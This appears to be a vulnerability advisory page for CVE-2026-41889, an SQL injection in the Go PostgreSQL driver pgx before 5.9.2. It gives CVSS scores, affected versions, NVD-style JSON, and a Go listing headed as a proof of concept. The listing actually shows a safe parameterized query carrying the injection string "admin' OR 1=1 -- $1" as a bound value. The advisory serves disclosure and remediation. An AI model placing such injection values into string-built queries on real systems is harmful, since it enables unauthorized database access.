Security Vulnerability Report
CVE-2026-41889 CVSS 9.8 CRITICAL

CVE-2026-41889

Published: 2026-05-08 17:16:31
Last Modified: 2026-05-21 19:58:12

Description

pgx is a PostgreSQL driver and toolkit for Go. Prior to version 5.9.2, SQL injection can occur when the non-default simple protocol is used, a dollar-quoted string literal is used in the SQL query, that string literal contains text that would be interpreted as a placeholder outside of a string literal, and the value of that placeholder is controllable by the attacker. This issue has been patched in version 5.9.2.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Note: the 9.8 CRITICAL figure is the primary CVSS 3.1 assessment. The raw JSON below also carries a secondary CVSS 4.0 assessment with base score 2.3 (LOW), which rates attack complexity as high, attack requirements as present, privileges required as low, and integrity impact as low only — consistent with the preconditions in the description (non-default simple protocol, a dollar-quoted literal containing placeholder-like text, and an attacker-controlled placeholder value all being required).

Configurations (Affected Products)

cpe:2.3:a:jackc:pgx:*:*:*:*:*:go:*:* - VULNERABLE
pgx < 5.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
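package main

import (
	"context"
	"fmt"
	"log"

	"github.com/jackc/pgx/v5"
)

// main connects to PostgreSQL with pgx and runs a lookup whose user-controlled
// value is passed as a bound query argument instead of being spliced into the
// SQL text.
//
// CVE-2026-41889 (pgx < 5.9.2) requires all of the following at once: the
// non-default simple protocol is in use, the SQL text contains a dollar-quoted
// string literal, that literal contains text that looks like a placeholder
// (e.g. $1) and the value bound to that placeholder is attacker-controlled.
// The fix is to upgrade to pgx 5.9.2. Independently of the version, keeping
// the default protocol and never building SQL text from untrusted input (as
// done below) keeps the vulnerable construction out of the code base. The
// original listing spliced the input into the query with fmt.Sprintf, which is
// plain string-built SQL and does not exercise the advisory's placeholder path.
func main() {
	ctx := context.Background()

	// Placeholder connection string; real deployments should load credentials
	// from configuration and must not log this value.
	connStr := "postgres://user:password@localhost/testdb"
	conn, err := pgx.Connect(ctx, connStr)
	if err != nil {
		log.Fatalf("connecting to database: %v", err)
	}
	defer conn.Close(ctx)

	// Untrusted input, the same value the original listing used. As a bound
	// argument its content is never interpreted as SQL.
	userInput := "admin' OR 1=1 -- $1"

	// Parameterized query: the SQL text is a constant with no dollar quoting,
	// so neither string-built injection nor the CVE-2026-41889 condition applies.
	rows, err := conn.Query(ctx, "SELECT * FROM users WHERE name = $1", userInput)
	if err != nil {
		log.Fatalf("querying users: %v", err)
	}
	defer rows.Close()

	matched := 0
	for rows.Next() {
		matched++
	}
	// Errors can surface only while iterating; the result is not trustworthy
	// until rows.Err has been checked (the original listing skipped this).
	if err := rows.Err(); err != nil {
		log.Fatalf("reading rows: %v", err)
	}
	fmt.Printf("matched %d row(s)\n", matched)
}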

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41889", "sourceIdentifier": "[email protected]", "published": "2026-05-08T17:16:31.040", "lastModified": "2026-05-21T19:58:12.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pgx is a PostgreSQL driver and toolkit for Go. Prior to version 5.9.2, SQL injection can occur when the non-default simple protocol is used, a dollar quoted string literal is used in the SQL query, that string literal contains text that would be would be interpreted as a placeholder outside of a string literal, and the value of that placeholder is controllable by the attacker. This issue has been patched in version 5.9.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jackc:pgx:*:*:*:*:*:go:*:*", "versionEndExcluding": "5.9.2", "matchCriteriaId": "3183A68D-CD63-4678-9310-13BEB97F3112"}]}]}], "references": [{"url": "https://github.com/jackc/pgx/commit/60644f84918a8af66d14a4b0d865d4edafd955da", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/jackc/pgx/releases/tag/v5.9.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/jackc/pgx/security/advisories/GHSA-j88v-2chj-qfwx", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}